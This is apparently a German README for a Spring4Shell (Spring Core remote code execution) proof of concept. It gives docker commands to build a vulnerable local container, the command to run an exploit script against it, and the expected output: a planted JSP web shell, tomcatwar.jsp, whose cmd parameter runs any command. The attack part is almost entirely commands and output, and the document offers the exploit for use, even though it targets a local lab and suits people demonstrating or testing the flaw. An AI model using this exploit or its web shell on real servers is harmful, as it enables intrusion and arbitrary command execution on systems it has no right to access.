
Ein weiterer spring4shell (Spring core RCE) POC
Diese Schwachstelle betrifft Spring Core und ermöglicht es einem Angreifer, eine speziell gestaltete HTTP-Anfrage zu senden, um die Schutzmechanismen im HTTP-Request-Parser der Bibliothek zu umgehen, was zu Remote-Codeausführung führt.
Weitere Informationen Hier

Damit diese Schwachstelle ausgenutzt werden kann, müssen mehrere Bedingungen erfüllt sein
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
Die erwartete Antwort
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
Wenn du diese URL aufrufst, wird jeder Befehl ausgeführt, den du möchtest: cmd=<whatyouwant>

Wenn du per SSH auf den Container zugreifst, wirst du sehen, dass eine neue Datei erstellt wurde: tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT